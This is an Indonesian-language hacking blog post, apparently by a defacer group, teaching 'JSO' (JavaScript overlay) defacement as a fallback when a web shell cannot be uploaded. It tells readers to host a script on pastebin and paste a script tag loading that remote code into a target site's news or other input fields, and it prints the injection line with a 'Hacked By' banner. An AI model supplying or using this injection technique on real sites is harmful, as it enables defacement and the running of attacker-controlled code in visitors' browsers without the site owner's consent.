loading...

SCRIPT JSO (JAVA SCRIPT OVERLAY)


Assalamualaikum warahmatullahi wabarakatuh, ketemu lagi sama gue, kali ini gue akan share script jso ..
oke, simak di sini :)

Btw, JSO di gunakan kalo gak bisa up shel yaa ;)

kalo udah, sekarang kita tinggal taro scriptnya bisa ke pastebin atau ghostbin yaa :)
Dan pilih java script, lalu oke dan masukin kodenya dan tinggal pencet raw trus copy deh ;)

Oke, sekarang tinggal ganti link sc jso nya yang sudah kalian buat yaa :)

Hacked By TN72
<script type="text/javascript" src="https://pastebin.com/raw/LhGPAkkZ"></script>
(catatan : https://pastebin.com/raw/LhGPAkkZ adalah link sc jso gue .. )

Oke beres, tinggal tempel deh dibagian news atau lainnya ;)

Boleh kali nitiv nick gue dan team :)
TN72 dan GARUDA TERSAKTI 72 .

Greet :

INDONESIAN DEFACER'S
Tag : hacking, Tutorial
0 Komentar untuk "SCRIPT JSO (JAVA SCRIPT OVERLAY)"

Back To Top